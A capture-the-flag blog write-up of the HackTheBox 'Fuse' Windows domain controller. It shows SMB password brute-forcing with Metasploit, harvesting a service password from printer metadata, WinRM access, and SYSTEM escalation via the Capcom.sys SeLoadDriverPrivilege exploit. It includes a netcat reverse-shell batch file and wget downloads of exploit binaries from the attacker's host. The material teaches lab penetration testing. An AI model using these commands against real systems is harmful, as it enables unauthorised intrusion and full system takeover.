Post

Hackthebox Fuse Writeup

Hackthebox Fuse Writeup

Information:~$

TitleDetails
NameFuse
IP10.10.10.193
DifficultyMedium
Points30
OSWindows

Brief:~$

Fuse is Medium rated Windows box. On PORT 80 We get potentail usernames and using cewl we can make a password list form website. Which then can be used in msfconsole to find the correct username and password. Thtne using smbpasswd we cna change the password of tlavel user and using rpcclinet we get some new users and a password. For Initial foothold evil-winrm can be used to gain access to system and then exploiting SeLoadDriverPrivilege to gain authoriy over system

Reconnaissance:~$

Namp:~$

1
nmap -sC -sV -v -oN nmap/initial 10.10.10.193

We get a bunch of Interesting Information

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
# Nmap 7.80 scan initiated Mon Jul  6 19:03:55 2020 as: nmap -sC -sV -v -oN nmap/initial 10.10.10.193
Nmap scan report for 10.10.10.193
Host is up (0.36s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-07-06 13:51:58Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=7/6%Time=5F03286B%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h37m28s, deviation: 4h02m31s, median: 17m26s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Fuse
|   NetBIOS computer name: FUSE\x00
|   Domain name: fabricorp.local
|   Forest name: fabricorp.local
|   FQDN: Fuse.fabricorp.local
|_  System time: 2020-07-06T06:54:40-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-07-06T13:54:39
|_  start_date: 2020-07-06T12:21:43

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul  6 19:09:51 2020 -- 1 IP address (1 host up) scanned in 355.93 seconds

We get Few Ports open Let’s start with PORT 80

Enumeration:~$

On opening http://10.10.10.193 we get redirected to http://fuse.fabricorp.local/papercut/logs/html/index.htm

Fuse

So let’s add fuse.fabricorp.local to our host file

After spending some time on website and trying fuzzing I only got few usernames from

1
2
3
http://fuse.fabricorp.local/papercut/logs/html/papercut-print-log-2020-05-29.htm
http://fuse.fabricorp.local/papercut/logs/html/papercut-print-log-2020-05-30.htm
http://fuse.fabricorp.local/papercut/logs/html/papercut-print-log-2020-06-10.htm
1
2
3
4
pmerton
tlavel
sthompson
bhult

Okay we got usernames but where we can use them and what is the password

We can use cewl to make a password list from website

1
cewl -d 5 -m 3 -w pass.lst  http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers

So after getting potential usernames and a password list let’s see if we can mount smb shares

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
msf5 auxiliary(scanner/smb/smb_login) > set RHOST fuse.htb
RHOST => fuse.htb
msf5 auxiliary(scanner/smb/smb_login) > set user_file user2.txt
user_file => user2.txt
msf5 auxiliary(scanner/smb/smb_login) > set pass_file pass.list
pass_file => pass.list
msf5 auxiliary(scanner/smb/smb_login) > 
msf5 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.10.193:445      - 10.10.10.193:445 - Starting SMB login bruteforce
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\tlavel:Print',
[!] 10.10.10.193:445      - No active DB -- Credential data will not be saved!
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\tlavel:2020',
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\tlavel:PaperCut',
................
[+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\tlavel:Fabricorp01'
................
[*] fuse.htb:445          - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We got a match let’s try to login

1
2
3
4
[vibhu@parrot]─[~/HTB/boxes/Fuse]$ smbclient -L fuse.htb -U tlavel
Enter WORKGROUP\tlavel's password: 
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
[vibhu@parrot]─[~/HTB/boxes/Fuse]$ 

Okay so we need to change password for smb We can use smbpasswd to do that

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
[vibhu@parrot]─[~/HTB/boxes/Fuse]$ smbpasswd -r fuse.htb -U tlavel
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user tlavel
[vibhu@parrot]─[~/HTB/boxes/Fuse]$ smbclient -L fuse.htb -U tlavel
Enter WORKGROUP\tlavel's password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	HP-MFT01        Printer   HP-MFT01
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	print$          Disk      Printer Drivers
	SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available
[vibhu@parrot]─[~/HTB/boxes/Fuse]$

We can use rpcclient for furtherr enumeration

1
2
3
[vibhu@parrot]─[~/HTB/boxes/Fuse]$ rpcclient -L fuse.htb -U tlavel
Enter WORKGROUP\tlavel's password: 
rpcclient $>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]

We get some new users save them user.list

On spending some time here and trying different things I got enumprinters

1
2
3
4
5
6
7
rpcclient $> enumprinters
	flags:[0x800000]
	name:[\\10.10.10.193\HP-MFT01]
	description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
	comment:[]

rpcclient $>

We get a password $fab@s3Rv1ce$1 btu for which user

Initial Foothold:~$

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
msf5 auxiliary(scanner/winrm/winrm_login) > set RHOSTS fuse.htb
RHOSTS => fuse.htb
msf5 auxiliary(scanner/winrm/winrm_login) > set user_file user.list
user_file => user.list
msf5 auxiliary(scanner/winrm/winrm_login) > set password $fab@s3Rv1ce$1
password => $fab@s3Rv1ce$1
msf5 auxiliary(scanner/winrm/winrm_login) > show options

Module options (auxiliary/scanner/winrm/winrm_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DOMAIN            WORKSTATION      yes       The domain to use for Windows authentification
   PASSWORD          $fab@s3Rv1ce$1   no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            fuse.htb         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             5985             yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   URI               /wsman           yes       The URI of the WinRM service
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE         user.list        no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
   VHOST                              no        HTTP server virtual host
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
msf5 auxiliary(scanner/winrm/winrm_login) > run  
[!] No active DB -- Credential data will not be saved!
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\DefaultAccount:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\Administrator:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\krbtgt:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\pmerton:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\tlavel:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\sthompson:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\bhult:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\bnielson:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\dandrews:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\mberbatov:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\astein:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\dmuir:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\svc-scan:$fab@s3Rv1ce$1 (Incorrect: )
[+] 10.10.10.193:5985 - Login Successful: WORKSTATION\svc-print:$fab@s3Rv1ce$1
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\Guest:$fab@s3Rv1ce$1 (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We can use evil-winrm

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
[vibhu@parrot]─[~/HTB/boxes/Fuse]$ evil-winrm -i fuse.htb -u svc-print -p '$fab@s3Rv1ce$1'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-print\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\svc-print\Desktop> dir


    Directory: C:\Users\svc-print\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         7/8/2020   4:37 AM             34 user.txt


*Evil-WinRM* PS C:\Users\svc-print\Desktop> whoami 
fabricorp\svc-print
*Evil-WinRM* PS C:\Users\svc-print\Desktop>

Privilege Escalation:~$

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
*Evil-WinRM* PS C:\> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== ==============================================
fabricorp\svc-print S-1-5-21-2633719317-1471316042-3957863514-1104


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
FABRICORP\IT_Accounts                      Group            S-1-5-21-2633719317-1471316042-3957863514-1604 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\>

We have privilege to LoadDriver So we are going to exploit that to gain authority over system

1
SeLoadDriverPrivilege         Load and unload device drivers Enabled

But how Here’s an amazing article on exploiting it

For exploiting we need 2 files

FileLink
eoploaddriver.cppHere
ExploitCapcom.cppHere

Compile all the files and transfer them to machine along with nc.exe and netcat.bat

1
2
[vibhu@parrot]─[~/HTB/boxes/Fuse/priv/htb-scripts/exploit-fuse]$ cat netcat.bat 
c:\temp\nc.exe 10.10.14.166 9001 -e cmd.exe

Let’s transfer the files

1
2
3
4
5
*Evil-WinRM* PS C:\temp> wget http://10.10.14.166:8000/EOPLOADDRIVER.exe -o EOPLOADDRIVER.exe
*Evil-WinRM* PS C:\temp> wget http://10.10.14.166:8000/ExploitCapcom_modded.exe -o ExploitCapcom.exe
*Evil-WinRM* PS C:\temp> wget http://10.10.14.166:8000/Capcom.sys -o Capcom.sys
*Evil-WinRM* PS C:\temp> wget http://10.10.14.166:8000/nc.exe -o nc.exe
*Evil-WinRM* PS C:\temp> wget http://10.10.14.166:8000/netcat.bat -o netcat.bat

Meanwhile on our server

1
2
3
4
5
6
7
[vibhu@parrot]─[~/HTB/boxes/Fuse/priv/htb-scripts/exploit-fuse]$ python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.10.193 - - [08/Jul/2020 17:22:11] "GET /EOPLOADDRIVER.exe HTTP/1.1" 200 -
10.10.10.193 - - [08/Jul/2020 17:22:26] "GET /ExploitCapcom_modded.exe HTTP/1.1" 200 -
10.10.10.193 - - [08/Jul/2020 17:22:39] "GET /Capcom.sys HTTP/1.1" 200 -
10.10.10.193 - - [08/Jul/2020 17:23:00] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.193 - - [08/Jul/2020 17:23:11] "GET /netcat.bat HTTP/1.1" 200 -
1
2
3
4
5
6
7
8
9
10
11
12
13
*Evil-WinRM* PS C:\temp> ls


    Directory: C:\temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         7/8/2020   5:10 AM          10576 Capcom.sys
-a----         7/8/2020   5:10 AM          15360 EOPLOADDRIVER.exe
-a----         7/8/2020   5:10 AM         275968 ExploitCapcom.exe
-a----         7/8/2020   5:10 AM          59392 nc.exe
-a----         7/8/2020   5:11 AM             44 netcat.bat

Let’s exploit it

1
2
3
4
5
6
7
8
9
10
11
12
13
*Evil-WinRM* PS C:\temp> .\EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\temp\capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
NTSTATUS: c0000035, WinError: 0
*Evil-WinRM* PS C:\temp> .\ExploitCapcom.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000080
[*] Shellcode was placed at 000001A0DA410008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program

Don’t forget to start a listner on our server

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
[vibhu@parrot]─[~/HTB/boxes/Fuse/priv]$ rlwrap nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.10.14.166] from (UNKNOWN) [10.10.10.193] 50066
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\temp>whoami
whoami
nt authority\system

C:\temp>cd /Users/Administrator/Desktop
cd /Users/Administrator/Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
6b2*********************e49494614

Resources:~$

TopicLink
SeLoadDriverPrivilegeHere

With this, we come to the end of the story of how I owned Fuse 😃

Thank you for reading !!!

I would love to hear about any suggestions or queries.

This post is licensed under CC BY 4.0 by the author.